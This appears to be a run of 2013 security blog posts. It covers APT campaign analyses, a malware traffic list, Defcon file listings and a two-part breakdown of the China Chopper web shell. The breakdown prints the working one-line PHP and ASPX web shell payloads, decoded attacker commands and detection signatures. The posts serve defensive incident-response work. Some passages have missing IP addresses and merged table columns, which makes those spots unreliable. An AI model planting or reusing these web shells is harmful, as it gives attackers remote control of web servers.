So the Transcend SD WiFi Card is completely vulnerable to all kinds of bad things. The tiny little card runs Linux and even has netcat installed! There's a web server on there where you can upload more fun scripts that let you do all kinds of things you shouldn't be able to. Things like see the user's password in the web page source code or remote file includes. But to leave netcat installed and leave open the ability to get a shell on an SD card? As Larry asks "The smaller the device, the less attention that is paid to security??"

While out at Black Hat, Allison got to play with the Hot Plug. No no, in spite of the name this is not some kind of sex toy. Instead, it's a great device that allows you to remove the power plug from a wall socket but still leave the device powered on. According to Allison, it's a male-to-male plug where you just slightly remove the plug from the socket, connect the Hot Plug and then remove the plug from the socket.

There are more discussions and articles but finally, Paul brought up this Dark Reading article by Maxim Weinstein called The More Things Change. This article goes into how many millions of malware variants we've seen through the years, but in the end, all of these hacks require at least one of three things: "exploiting a vulnerability, compromising user credentials, and/or tricking the user." The real question is how we fix these?

Ok, one more. There's an add-on to the Leap Motion device where you can simply use hand (or other) gestures to log in to your Windows machine. Oh so many ways that we could log in...

There are all these stories and more this week on the Security Weekly Drunken Security News!

The Sunshop Campaign Continues

We recently detected what we believe is a continuation of the Sunshop campaign that we first revealed on May 20, 2013.

This follow-on to the Sunshop campaign started on July 17, 2013. In this latest wave the attackers inserted malicious redirects into a number of websites – at least two of which were also compromised in the May 2013 edition of this campaign. The most prominent sites compromised in this round of the campaign were maintained by a Human Rights organization and an organization involved in science and technology policy development.

The compromised websites redirected victims to www[.]vwalls[.]com/maxi/enough/wildpost/files/2977.html. This page was last modified on July 17, 2013 at 09:51:01 GMT and contained the following code:

<applet archive="MnDK6AQJbV9qSo15.jar" code="Xxploit.class" width="1" height="1">


A .jar file with the same filename and md5 hash of 8b88de786a219340ff04bc53de196f46 was uploaded to on July 19, 2013. This malicious .jar exploited CVE-2013-2423 and dropped an interesting variant of Trojan.APT.9002.

The dropped payload had a md5 hash of f4ba5fd0a4f32f92aef6d5c4d971bf14 and was compiled on June 25, 2013. This Trojan.APT.9002 variant called back to appupdate[.]myvnc[.]com. This domain resolved to – one of the same command and control IP address used in the Sunshop campaign.

A related .jar file with the filename fiUJ3OTjBWZEUH8H.jar (md5: 04ad4f479997ca7bf8de216a67e23972) was also found. This jar file was first uploaded to on July 17, 2013. This malicious jar also exploited CVE-2013-2423 and dropped a modified 9002 RAT payload with the md5 53c5570178403b6fbb423961c3831eb2. This variant called back to intelupdate[.]hopto[.]org which resolved to It is possible that fiUJ3OTjBWZEUH8H.jar was used first then swapped out for MnDK6AQJbV9qSo15.jar for this instantiation of the Sunshop campaign.


The typical 9002 variant sends the ascii characters ‘9002’ as the first 4-bytes of its communications back to the command and control server. In contrast, this modified variant sent the ascii characters ‘0113’ as the first 4-bytes back to its command and control server.

Variant Hex encoded Beacon between Victim and C2
9002 9002 39 30 30 32 0c 00 00 00 08 00 00 00 19 ff ff ff ff 00 00 00 00 11 00 00 39 30 30 32 0c 00 00 00 08 00 00 00 19 ff ff ff ff 00 00 00 00 11 00 00
0113 0113 30 31 31 33 0c 00 00 00 08 00 00 00 19 ff ff ff ff 00 00 00 00 11 00 00 30 31 31 33 0c 00 00 00 08 00 00 00 19 ff ff ff ff 00 00 00 00 11 00 00

This change, while seemingly minor, would evade signatures that looked for the entire 24-byte string of the beacon packet. Bytes 5 through 24 are constant across both variants and are therefore better candidates for signatures. FireEye detects both variants as Trojan.APT.9002.


We are almost certain that the same actors responsible for the original Sunshop campaign executed these most recent attacks. We observed the following commonalities between the two attack cycles:

- At least two of the same strategic websites were compromised

- A variant of the same Trojan.APT.9002 malware was dropped

- The same c2 IP,, was used in both attacks

While it is unclear what prompted the modification of the Trojan.APT.9002 backdoor, it is possible that the adversary felt this modification would increase the attacks chances of success.

It is also unclear how easy it is for the adversary to implement this change in the network protocol. This change could in theory be enabled through an easy to use GUI builder or it could as complex as making changes to the source code. The level of complexity of this change and availability of either a builder or the source code will dictate how often we would expect to see similar changes in this tool.

This example of evasion at the network level also demonstrates the importance of crafting robust signatures that will survive the changes in techniques, tactics and procedures made by the adversary.

Mandiant @ Black Hat USA 2013 Wrap-Up

Another Black Hat has come and gone, and with it the flurry of activities while in Las Vegas, NV. We here at Mandiant were in full swing at the show with a booth, training courses, M-Lair, arsenal sessions, and book signings; just to name a few events. It's a lot to take in, but I made sure to snap some photos through-out the week.

During the conference we held a couple of podcast sessions to discuss new and popular freeware tools:

To add something new to the mix, we hosted two "Day in the Life" sessions to show attendees what a typical day is like for those in our Mandiant Labs (M-Labs) and Managed Defense MCIRT Analyst teams. Each presentation was met with a packed room and great questions from the audience. If you're interested in working at Mandiant, make sure to check out our careers page.

I hope you had a chance to meet-up with us at one of our many events while at Black Hat 2013. We hope to see you at our annual conference, MIRcon, November 5-6, at the JW Marriott in Washington, DC.

Survival of the Fittest: New York Times Attackers Evolve Quickly

The attackers behind the breach of the New York Times’ computer network late last year appear to be mounting fresh assaults that leverage new and improved versions of malware.

The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China [1].

The newest campaign uses updated versions of Aumlib and Ixeshe.

Aumlib, which for years has been used in targeted attacks, now encodes certain HTTP communications. FireEye researchers spotted the malware when analyzing a recent attempted attack on an organization involved in shaping economic policy.

And a new version of Ixeshe, which has been in service since 2009 to attack targets in East Asia, uses new network traffic patterns, possibly to evade traditional network security systems.

The updates are significant for both of the longstanding malware families; before this year, Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011.


Cybercriminals are constantly evolving and adapting in their attempts to bypass computer network defenses. But, larger, more successful threat actors tend to evolve at a slower rate.

As long as these actors regularly achieve their objective (stealing sensitive data), they are not motivated to update or rethink their techniques, tactics, or procedures (TTPs). These threat actors’ tactics follow the same principles of evolution – successful techniques propagate, and unsuccessful ones are abandoned. Attackers do not change their approach unless an external force or environmental shift compels them to. As the old saying goes: If it ain’t broke, don’t fix it.

So when a larger, successful threat actor changes up tactics, the move always piques our attention. Naturally, our first priority is ensuring that we detect the new or altered TTPs. But we also attempt to figure out why the adversary changed — what broke? — so that we can predict if and when they will change again in the future.

We observed an example of this phenomenon around May. About four months after The New York Times publicized an attack on its network, the attackers behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families [2].

The previous versions of Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011.

We cannot say for sure whether the attackers were responding to the scrutiny they received in the wake of the episode. But we do know the change was sudden. Akin to turning a battleship, retooling TTPs of large threat actors is formidable. Such a move requires recoding malware, updating infrastructure, and possibly retraining workers on new processes.

The following sections detail the changes to Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe.


Aumlib has been used in targeted attacks for years. Older variants of this malware family generated the following POST request:

POST /bbs/info.asp HTTP/1.1

Data sent via this POST request transmitted in clear text in the following structure:


A recently observed malware sample (hash value 832f5e01be536da71d5b3f7e41938cfb) appears to be a modified variant of Aumlib.

The sample, which was deployed against an organization involved in shaping economic policy, was downloaded from the following URL:

status[.]acmetoy[.]com/DD/myScript.js or status[.]acmetoy[.]com/DD/css.css

The sample generated the following traffic:


This output reveals the following changes when compared with earlier variants:

  • The POST URI is changed to /bbs/search.asp (as mentioned, earlier Aumlib variants used a POST URI of /bbs/info.asp.)
  • The POST body is now encoded.

Additional requests from the sample generated the following traffic:


These subtle changes may be enough to circumvent existing IDS signatures designed to detect older variants of the Aumlib family.

The sample 832f5e01be536da71d5b3f7e41938cfb shares code with an older Aumlib variant with the hash cb3dcde34fd9ff0e19381d99b02f9692. The sample cb3dcde34fd9ff0e19381d99b02f9692 connected to documents[.]myPicture[.]info and www[.]documents[.]myPicture[.]info and as expected generated the a POST request to /bbs/info.asp.


Ixeshe has been used in targeted attacks since 2009, often against entities in East Asia [3]. Although the network traffic is encoded with a custom Base64 alphabet, the URI pattern has been largely consistent:

/[ACD] [EW]S[Numbers].jsp?[Base64]

We analyzed a recent sample that appears to have targeted entities in Taiwan, a target consistent with previous Ixeshe activity.


This sample (aa873ed803ca800ce92a39d9a683c644) exhibited network traffic that does not match the earlier pattern and therefore may evade existing network traffic signatures designed to detect Ixeshe related infections.


The Base64-encoded data still contains information including the victim’s hostname and IP address but also a “mark” or “campaign tag/code” that the threat actors use to keep track of their various attacks. The mark for this particular attack was [ll65].


Based on our observations, the most successful threat actors evolve slowly and deliberately. So when they do change, pay close attention.

Knowing how attackers’ strategy is shifting is crucial to detecting and defending against today’s advanced threats. But knowing the “why” is equally important. That additional degree of understanding can help organizations forecast when and how a threat actor might change their behavior — because if you successfully foil their attacks, they probably will.



[2] This actor is known as APT12 by Mandiant


HoneyPorts Automated Blocking, Threat Analytics w/ Ty Miller – Episode 340 – August 8, 2013

If you've seen one of mine, or John Strand's, presentations on offensive countermeasures, you know about Honeyports. If you've taken our class or read our book, you've seen this too! Just to recap:

If you tell your host to listen for connections on a port, and make certain the client is making a full TCP connection, you can "shun" or block the remote IP address. A Honeyport is a port that nothing should be listening on. When something, or someone, makes a connection to this port, you create and implement a local firewall rule on the host to block that IP address.

Previously we had shell scripts and a Windows command to make this happen. I wanted to extend this functionality, but quickly ran into limitations. So, I decided to write a Python script to implement this on all 3 platforms.

Ty Miller is CEO and Founder of Threat Intelligence , has had many TV appearances, radio interviews, print newspaper and magazine articles, and regular online commentary & BlackHat Trainings. Ty Miller's experience not only covers penetration testing, it also expands into regulations like PCI, developing and running industry benchmark accreditations, performing forensic investigations, as well as creating and executing security training ranging from introductory security through to highly advanced security concepts and skillsets. Today he is here to do a tech segment on his product Threat Analytics.

DeepEnd Research: List of malware pcaps, samples, and indicators for the Library of Malware Traffic Patterns

The library of malware traffic patterns have been popular. We found it very useful as well ourselves and we encourage you to send your contributions. I know at some point the spreadsheet will become unwieldy but I personally find it the most easy way (easy sort, search etc)

Currently, most of the samples described have the corresponding samples and pcaps available for download (email Mila @contagio for the password)
such as you see in the links below

Email us at mila [a t ] or adimino [a t]

The current list of malware described (as of Aug. 9, 2013)

19002Adware Hotbar
29002 POSTAndromeda
3Banechant 1ArcomRat / Dokstormac
4Banechant payload dl 2Ardamax keylogger
5BeebusAsprox Checkin
6Beebus C2 checkinAsproxGET list of C2s
7Beebus data sendAsproxGETs spam template
8Comfoo / Vinself / MspubAvatar Rootkit
9Cookies /Cookiebag / DalbotBeebone downloader
11CVE-2012-0754 SWF in DOCBlackhole 2
12CVE-2012-0779Blackhole v2
14Destory Rat / Sogu / ThoperCarberp
15Disttrack / ShamoonCitadel
16DNSWatch / ProtuxCutwail / Pushdo
17Downloader BMPDarkmegi
18EinsteinDarkness DDos v8g
19Einstein data sendDirtJumper DDoS
20Enfal / LuridDNSChanger
21FavoritesEK - Blackhole 2 landing
22FoxyEK Blackhole 1
23Foxy CheckinEK Neutrino
24Gh0stEK Phoenix
25Gh0st ASP verFakeAV var (via Kuluoz - Asprox botnet)
26Gh0st PHP verFlashback OSX
27Gh0st v2000 varGameThief
28Gh0st varGapz C&C request
29GlassesGuntior - CN bootkit
31GoogleAdC2 2nd stageHiloti
32GooglesHOIC DDoS
33GreencatHorst Proxy
35Hangover Smackdown MinaproIRCbot
36Hupigon / GraybirdJBOSS worm
37icon.js - system info sendKaragany Loader
38IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRATKuluoz.B downloader
39IXESHEMatsnu - MBR wiping ransomware
41KoreanBanker DLMoney loader
42Letsgo / TabMsgSQLMutopy Downloader
43Letsgo / TabMsgSQL downloaderMutopy Downloader initial callback
45Lingbo (?)Pony loader
46Luckycat - WIMMIEPowerLoader
47LURKRanbyus / Triton (Spy, Banking, smart cards)
48Mediana ProxyReedum
49MiniASPShiz / Rohimafo DDoS
52MirageSweet Orange EK
53Mirage - later varSymmi Remote File Injector
54MongalTbot tor
55MSWab /YayihTinba aka Zusy
56MurcyUrausy (Ransomware)
60Pitty TigerZeroAccess / Sirefef
61PlugxZeroAccess / Sirefef - Counter site checkin
62PNG trojanZeroAccess / Sirefef ppc fraud - redirect
63Poison IvyZeus
64QuarianZeus Gameover
65RedOctober AuthInfo
66RedOctober Sysinfo
69Sanny / Win32.Daws
72Surtr 2nd Stage DL
73Surtr Initial GET
75Sykipot / Wyksol
79Tarsip Eclipse
80Tarsip Moon
81Variant Letsgo / TabMsgSQL downloader (comment crew)
87WEBC2-CSON Response to commands
90Xtreme Rat

Breaking Down the China Chopper Web Shell – Part II

Part II in a two-part series. Read Part I.


In Part I of this series, I described China Chopper's easy-to-use interface and advanced features — all the more remarkable considering the Web shell's tiny size: 73 bytes for the aspx version, 4 kilobytes on disk. In this post, I'll explain China Chopper's platform versatility, delivery mechanisms, traffic patterns, and detection. My hope is that armed with this information, you can eradicate this pest from your environment.


So what platform can China Chopper run on? Any Web server that is capable of running JSP, ASP, ASPX, PHP, or CFM. That's the majority of the Web application languages out there. What about operating systems? China Chopper is flexible enough to run transparently on both Windows and Linux. This OS and application flexibility makes this an even more dangerous Web shell.

In Part I of this series, we showed China Chopper executing on a Windows 2003 IIS server using ASPX. Now we will show it running on Linux with PHP. As shown in Figure 1, the contents of the PHP version are just as minimalistic:


Figure 1: This command is all that it takes to run on Linux with PHP.


While the available options differ depending on what platform China Chopper is running on, the file management features in Linux (see Figure 2) are similar to those in Windows.


Figure 2: File browsing on a target system running Linux


The database client example shown in Figure 3 is MySQL instead of MS-SQL, but it offers many of the same capabilities.


Figure 3: Database management from a target system running Linux


The virtual terminal looks familiar (Figure 4), but uses Linux commands instead of Windows because these are ultimately interpreted by the underlying operating system.


Figure 4: Virtual terminal from a target system running Linux


Delivery Mechanism

China Chopper's delivery mechanism can be very flexible due to the size, format, and simplicity of the malware's payload. This small, text-based payload can be delivered using any of the following mechanisms:

  • WebDAV file upload
  • JBoss jmx-console or Apache Tomcat management pages (For more details on this attack vector, read FireEye consultant Tony Lee’s explanation)
  • Remote exploit with a file drop
  • Lateral propagation from other access


Traffic Analysis

We have now seen the server side payload and the client that is used to control the Web shell. Now let's examine China Chopper's traffic. Fortunately, we have both the server and client components, so we can start a packet capture to view the contents of typical traffic. As shown in Figure 5, the client initiates the connection over TCP port 80 using the HTTP POST method.


Figure 5: A packet capture shows that the Web shell traffic is HTTP POST traffic over TCP port 80


Because this is TCP traffic, we can “follow the TCP” stream in Wireshark (a popular open-source network-protocol analyzer that works in Unix and Windows). In Figure 6, the traffic in red at the top is from the attacker (Web client). The traffic shown in blue at the bottom is the response from the target (Web shell).


Figure 6: After following the TCP stream, we can see that the majority of the attacker traffic is Base64 encoded.


As highlighted above, the majority of the attacker traffic appears to be Base64 encoded. This is not a problem, though, because it can be easily decoded. We use the “TextWizard” feature of the free Fiddler Web debugger to discover what the attacker is sending. (Note: %3D is a URL-encoded representation of the equal sign ("="). Fiddler needs this to be converted to an equals sign for proper decoding.)

Raw attacker traffic:


var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001).

GetString(System. Convert.FromBase64String










("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();&z1=Y21k&z2=Y2QgL2QgImM6



As shown In Figure 9, the Fiddler Web debugger text wizard easily converts the raw traffic from Base64 to plain text.


Figure 9: Fiddler Web debugger decodes the Base64 traffic


Decoded traffic:












Finally we have something more readable. However, our Base64-decoded traffic is now attempting to decode more Base64 traffic that is being stored as z1 and z2. Going back to our attacker traffic, right after the end of the “Password” parameter, we see the z1 and z2 parameters.

I've highlighted Base64-encoded parameters z1 and z2 in the following output:



Base64-decoded parameters z1 and z2:

z1=cmdz2=cd /d "c:\inetpub\wwwroot\"&whoami&echo [S]&cd&echo [E]


That explains how the client communicates with the shell. The “Password” parameter passes the code to the payload to be executed. The z1 is cmd, and z2 contains the arguments to the command prompt sent via cmd /c. All output is sent to standard output (stdout) back to the attacker, which creates the following response to the whoami command and the present working directory:

->|nt authority\network service[S]C:\Inetpub\wwwroot[E]|<-



Now that we understand the contents of China Chopper and what its traffic looks like, we can focus on ways to detect this pest both at the network and the host level.


With a standard Snort IDS in place, this traffic can be caught with relative ease. Keith Tyler gives a basic IDS signature to work in his early China Chopper blog post:


alert tcp any any -> any 80 ( sid:900001; content:"base64_decode";

http_client_body;flow:to_server,established; content:"POST"; nocase;

http_method; ;msg:"Webshell Detected Apache";)


To reduce false positives, we have tightened the Snort IDS signature to focus on China Chopper by looking for contents of “FromBase64String” and “z1” as follows:


(msg: "China Chopper with first Command Detected";

flow:to_server,established; content: "FromBase64String";

content: "z1"; content:"POST"; nocase;http_method;



classtype:web-application-attack; sid: 900000101;)


The following IDS signature looks for content of “FromBase64String” and any combination of “z” followed by one to three digits — it would find "z1”, “z10”, or “z100” for example. The idea: if the first command (z1) is missed, you still catch subsequent commands.


(msg: "China Chopper with all Commands Detected"; flow:to_server,established;

content: "FromBase64String"; content: "z"; pcre: "/Z\d{1,3}/i"; content:"POST"; nocase;http_method;



classtype:web-application-attack; sid: 900000102;)


Both of these IDS signatures can be modified for further optimization when depth and offset are considered. Be sure to put a valid SID in before implementing and test the signature for performance.

Now that we have discussed detection at the network level, we will see that detection at the host level is also possible. Because the shells must contain a predictable syntax, we can quickly attempt to find files that have that code in play.


Many methods can be used to find files that contain China Chopper. The quickest and easiest method, especially on a Linux machine, is probably using regular expressions. As shown in Figure 10, a quick egrep across your Web directory can help identify infected files.

egrep -re ' [<][?]php\s\@eval[(]\$_POST\[.+\][)];[?][>]' *.php


Figure 10:  Using egrep to find this Web shell


As you can see in Figure 10, the egrep and regex commands are a powerful combination. While the regex may seem like gibberish, it really is not as bad as it seems. Ian Ahl has created a few regex tutorials that can help improve your regex skills. Here are two to get you started:

Windows also provides a way to search files using regular expressions by using the native findstr command.


Figure 11: Using findstr to locate China Chopper


You may have noticed that we had to change up the regex a bit. This was necessary to get around some of the ways that findstr interprets regex. The command you would run is as follows:

findstr /R "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php


These examples show detection in the PHP shell. To find the ASPX shell, just modify the regex to fit the syntax of the ASPX shell as shown:

egrep -re '[<]\%\@\sPage\sLanguage=.Jscript.\%[>][<]\%eval.Request\.Item.+unsafe' *.aspx

findstr /R "[<]\%\@.Page.Language=.Jscript.\%[>][<]\%eval.Request\.Item.*unsafe" *.aspx


If you are not sure where all of the PHP or ASPX files are on a Windows host, you can use the dir command with some extended options to help you identify Web files that you may want to run our regex against (see Figure 12).

dir /S /A /B *.php



Figure 12: Recursive search through Windows using the dir command


Findstr also has an option to search all subdirectories (see Figure 13).

findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php



Figure 13: Using findstr to recursively locate multiple instances of the Web shell



I hope this explanation of China Chopper's features, platform versatility, delivery mechanisms, traffic analysis, and detection give you the knowledge and tools you need to eradicate this elegantly designed but dangerous menace.

Good hunting.

Defcon 21 Archives Speaker Materials

Hope it is not a copyright violation and won't cause too much hate. I know Defcon will post better and complete data soon but many / most attendees did not receive the presentation CDs to their great sadness because there were not enough CDs available for all. Many authors and attendees published Defcon and Blackhat presentations online as well -you can track them via Twitter

You can download it here for now. Check Defcon website often, they will post it soon. The list of files of the speaker materials is below. The zip file also includes short stories. Please note that some presentations submitted for the DVD were somewhat / significantly different from what was presented. But better this than nothing, right?



Las Vegas BSides 2013 - materials are here BSides Las Vegas 2013

Abraham Kang and Dinis Cruz

Alejandro Caceres

Alexandre Pinto

Amber Baldet
Andy Davis

Balint Seeber

Bogdan Alecu

Brendan O'Connor

Brian Gorenc and Jasiel Spelman

Chris John Riley

Chris Sumner and Randall Wald

Christine Dudley

Craig Young

Crowley and Panel

|   ---Extras
Dan Griffin

Daniel Chechik

Daniel Selifonov

Eric Fulton and Daniel Zolnikov

Eric Milam

Eric Robi and Michael Perklin

Etemadieh and Panel

Fatih Ozavci

|   ---Extras

|   ---Extras
|   Defcon 21 - 10000 Yen Source Code.txt
|   OpenGlider BoM.pdf
|   OpenGlider V0.1.x_t.txt
|   x35 coordinates.sldcrv.txt
---OpenGlider IGES Files
Franz Payer

Gregory Pickett

|   ---Extras
Hunter Scott

Jacob Thompson

Jaeson Schultz

Jason Staggs

|   ---Extras
Jim Denaro

Joe Bialek

|   ---Extras
Joe Grand

|   ---Extras
|   DEFCON-21-jtagulatorassembly.pdf
|   DEFCON-21-jtagulatorblockdiagram.pdf
|   DEFCON-21-jtagulatorbom.pdf
|   DEFCON-21-jtagulatorschematic.pdf
|   DEFCON-21-jtagulatortestproc.pdf
Firmware 1.1 (b9b49b3)
---Gerbers B
John Ortiz

|   ---Extras
Joseph Paul Cohen
|   ---Extras
|   DEFCON-21-blucat.base64
Justin Engler and Paul Vines

|   ---Extras
Justin Hendricks

Karl Koscher and Eric Butler

Lawrence and Panel

|   ---Extras
Marc Weber Tobias and Tobias Bluzmanis

Marion Marschalek

|   ---Extras
Melissa Elliott

Michael Perklin

|   ---Extras
|   ACLEncode.sln
|   README.txt
Michael Schrenk

Ming Chow

Neil Sikka

Nicolas Oberli

Nikhil Mittal

|   ---Extras
Pau Oliva Fora

Philip Polstra

|   ---Extras
Phorkus and Evilrob

Piotr Duszynski


|   ---Extras
Remy Baumgarten

Richard Thieme

|   ---Extras
    DEFCON-21-Richard Thieme-UFOs-and-Govt-Resources.txt
Ricky HIll

Robert Clark

Robert Stucke

Runa A Sandvik

Ryan Holeman

Sam Bowne

Sam Bowne and Matthew Prince

Scott Behrens and Brent Bandelgar

Teal Rogers and Alejandro Caceres

Tom Keenan

Tom Steele and Dan Kottman

Tony Mui and Wai-leng

|   ---Extras

Vaagn Toukharian and Tigran Gevorgyan

Wesley McGrew
DEFCON-21-McGrew-Pwn-The-Pwn-Plug .pdf

|   ---Extras
WiK and Mubix

Zak Blacher

|   ---Extras

bughardy and Eagle1753



Breaking Down the China Chopper Web Shell – Part I

Part I in a two-part series.

China Chopper: The Little Malware That Could

China Chopper is a slick little web shell that does not get enough exposure and credit for its stealth. Other than a good blog post from security researcher Keith Tyler, we could find little useful information on China Chopper when we ran across it during an incident response engagement. So to contribute something new to the public knowledge base — especially for those who happen to find the China Chopper server-side payload on one of their Web servers — we studied the components, capabilities, payload attributes, and the detection rate of this 4 kilobyte menace.


China Chopper is a fairly simple backdoor in terms of components. It has two key components:the Web shell command-and-control (CnC) client binary and a text-based Web shell payload (server component). The text-based payload is so simple and short that an attacker could type it by hand right on the target server — no file transfer needed.

Web Shell Client

The Web shell client used to be available on, but we would advise against visiting that site now.

Web shell (CnC) Client MD5 Hash
caidao.exe caidao.exe 5001ef50c7e869253a7c152a638eab8a 5001ef50c7e869253a7c152a638eab8a

The client binary is packed with UPX and is 220,672 bytes in size, as shown in Figure 1.

Client binary viewed in WinHex

Figure 1: Client binary viewed in WinHex

Using the executable file compressor UPX to unpack the binary allows us to see some of the details that were hidden by the packer.

C:\Documents and Settings\Administrator\Desktop>upx -d
5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08w       Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
File size         Ratio      Format      Name
--------------------   ------   -----------   -----------
700416 <-    220672   31.51%    win32/pe     decomp.exe
Unpacked 1 file.

Using PEiD (a free tool for detecting packers, cryptors and compilers found in PE executable files), we see that the unpacked client binary was written in Microsoft Visual C++ 6.0, as shown in Figure 2.


Figure 2: PEiD reveals that the binary was written using Visual C++ 6.0

Because the strings are not encoded, examining the printable strings in the unpacked binary provides insight into how the backdoor communicates. We were intrigued to see a reference to using the Chinese (simplified) language parameter (Figure 3) as well as references to the text “Chopper" (Figure 4).


Figure 3: Printable strings refer to


Figure 4: References to Chopper in the client binary

So we have highlighted some attributes of the client binary. But what does it look like in use? China Chopper is a menu-driven GUI full of convenient attack and victim-management features. Upon opening the client, you see example shell entries that point to, which originally hosted components of the Web shell.

To add your own target, right click within the client, select “Add” and enter the target IP address, password, and encoding as shown in Figure 5.


Figure 5: Picture of the China Chopper Web shell client binary

Server-side Payload Component

But the client is only half of the remote access tool — and not likely the part you would find on your network. Its communication relies on a payload in the form of a small Web application. This payload is available in a variety of languages such as ASP, ASPX, PHP, JSP, and CFM. Some of the original files that were available for download are shown with their MD5 hashes:

Web shell Payload MD5 Hash
Customize.aspx Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08 8aa603ee2454da64f4c70f24cc0b5e08
Customize.cfm Customize.cfm ad8288227240477a95fb023551773c84 ad8288227240477a95fb023551773c84
Customize.jsp Customize.jsp acba8115d027529763ea5c7ed6621499 acba8115d027529763ea5c7ed6621499


Even though the MD5s are useful, keep in mind that this is a text-based payload that can be easily changed, resulting in a new MD5 hash. We will discuss the payload attributes later, but here is an example of just one of the text-based payloads:


 <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>

Note that “password” would be replaced with the actual password to be used in the client component when connecting to the Web shell.

In the next post, we provide regular expressions that can be used to find instances of this Web shell.


The capabilities of both the payload and the client are impressive considering their size.  The Web shell client contains a “Security Scan” feature, independent of the payload, which gives the attacker the ability to spider and use brute force password guessing against authentication portals.


Figure 6: China Chopper provides a “Security Scan” feature

In addition to vulnerability hunting, this Web shell has excellent CnC features when combining the client and payload, include the following:

  • File Management (File explorer)
  • Database Management (DB client)
  • Virtual Terminal (Command shell)

In China Chopper's main window, right-clicking one of the target URLs brings up a list of possible actions (see Figure 7).


Figure 7: Screenshot of the CnC client showing capabilities of the Web shell

File Management

Used as a remote access tool (RAT), China Chopper makes file management simple.  Abilities include uploading and downloading files to and from the victim, using the file-retrieval tool wget to download files from the Web to the target, editing, deleting, copying, renaming, and even changing the timestamp of the files.


Figure 8: File Management provides an easy to use menu that is activated by right-clicking on a file name

So just how stealthy is the “Modify the file time” option? Figure 9 shows the timestamps of the three files in the test directory before the Web shell modifies the timestamps. By default, Windows Explorer shows only the “Date Modified” field. So normally, our Web shell easily stands out because it is newer than the other two files.


Figure 9: IIS directory showing time stamps prior to the time modification

Figure 10 shows the date of the file after the Web shell modifies the timestamp. The modified time on our Web shell shows up as the same as the other two files. Because this is the default field displayed to users, it easily blends in to the untrained eye — especially with many files in the directory.


Figure 10: IIS directory showing time stamps after the time modification

Clever investigators may think that they can spot the suspicious file due to the creation date being changed to the same date as the modified date. But this is not necessarily anomalous. Additionally, even if the file is detected, the forensic timeline would be skewed because the date that the attacker planted the file is no longer present. To find the real date the file was planted, you need to go to the Master File Table (MFT). After acquiring the MFT using FTK, EnCase, or other means, we recommend using mftdump (available from Written by FireEye researcher Mike Spohn, mftdump is a great tool for extracting and analyzing file metadata.

The following table shows the timestamps pulled from the MFT for our Web shell file. We pulled the timestamps before and after the timestamps were modified. Notice that the “fn*” fields retain their original times, thus all is not lost for the investigator!

Category Pre-touch match Post-touch match
siCreateTime (UTC) siCreateTime (UTC) 6/6/2013 16:01 6/6/2013 16:01 2/21/2003 22:48 2/21/2003 22:48
siAccessTime (UTC) siAccessTime (UTC) 6/20/2013 1:41 6/20/2013 1:41 6/25/2013 18:56 6/25/2013 18:56
siModTime (UTC) siModTime (UTC) 6/7/2013 0:33 6/7/2013 0:33 2/21/2003 22:48 2/21/2003 22:48
siMFTModTime (UTC) siMFTModTime (UTC) 6/20/2013 1:54 6/20/2013 1:54 6/25/2013 18:56 6/25/2013 18:56
fnCreateTime (UTC) fnCreateTime (UTC) 6/6/2013 16:01 6/6/2013 16:01 6/6/2013 16:01 6/6/2013 16:01
fnAccessTime (UTC) fnAccessTime (UTC) 6/6/2013 16:03 6/6/2013 16:03 6/6/2013 16:03 6/6/2013 16:03
fnModTime (UTC) fnModTime (UTC) 6/4/2013 15:42 6/4/2013 15:42 6/4/2013 15:42 6/4/2013 15:42
fnMFTModTime (UTC) fnMFTModTime (UTC) 6/6/2013 16:04 6/6/2013 16:04 6/6/2013 16:04 6/6/2013 16:04

Database Management

The Database Management functionality is impressive and helpful to the first-time user.  Upon configuring the client, China Chopper provides example connection syntax.


Figure 11: Database Management requires simple configuration parameters to connect

After connecting, China Chopper also provides helpful SQL commands that you may want to run.


Figure 12: Database Management provides the ability to interact with a database and even provides helpful prepopulated commands

Command Shell Access

Finally, command shell access is provided for that OS level interaction you crave. What a versatile little Web shell!


Figure 13: Virtual Terminal provides a command shell for OS interaction

Payload Attributes

We stated above that this backdoor is stealthy due to a number of factors including the following:

  • Size
  • Server-side content
  • Client-side content
  • AV detection rate


Legitimate and illegitimate software usually suffer from the same principle: more features equals more code, which equals larger size. Considering how many features this Web shell contains, it is incredibly small — just 73 bytes for the aspx version, or 4 kilobytes on disk (see Figure 14). Compare that to other Web shells such as Laudanum (619 bytes) or RedTeam Pentesting (8,527 bytes). China Chopper is so small and simple that you could conceivably type the contents of the shell by hand.


Figure 14: China Chopper file properties

Server-Side Content

The server side content could easily be overlooked among the other files associated with a vanilla install of a complex application. The code does not look too evil in nature, but is curious.


Figure 15: The content of the file seems relatively benign, especially if you add a warm and fuzzy word like Security as the shell password

Below are the contents of the Web shell for two of its varieties.




 <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>






 <?php @eval($_POST['password']);?>



Client-Side Content

Because all of the code is server-side language that does not generate any client-side code, browsing to the Web shell and viewing the source as a client reveals nothing.


Figure 16: Viewing the source of the web shell reveals nothing to the client

Anti-virus Detection Rate

Running the Web shell through the virus-scanning website No Virus Thanks shows a detection rate of 0 out of 14, indicating that most, if not all, anti-virus tools would miss the Web shell on an infected system.


Figure 17: Results of multiple anti-virus engine inspections showing China Chopper coming up clean

The same holds true for VirusTotal. None of its 47 anti-virus engines flags China Chopper as malicious.


Figure 18: Results of multiple AV engine inspections showing the Web shell comes up clean


We hope that this post has advanced the understanding of this compact, flexible, and stealthy Web shell. If you are reading this, you may be facing China Chopper right now — if so, we wish you success in eradicating this pest. In Part II, we examine the platform China Chopper runs on and describe its delivery mechanisms, traffic analysis and detection.

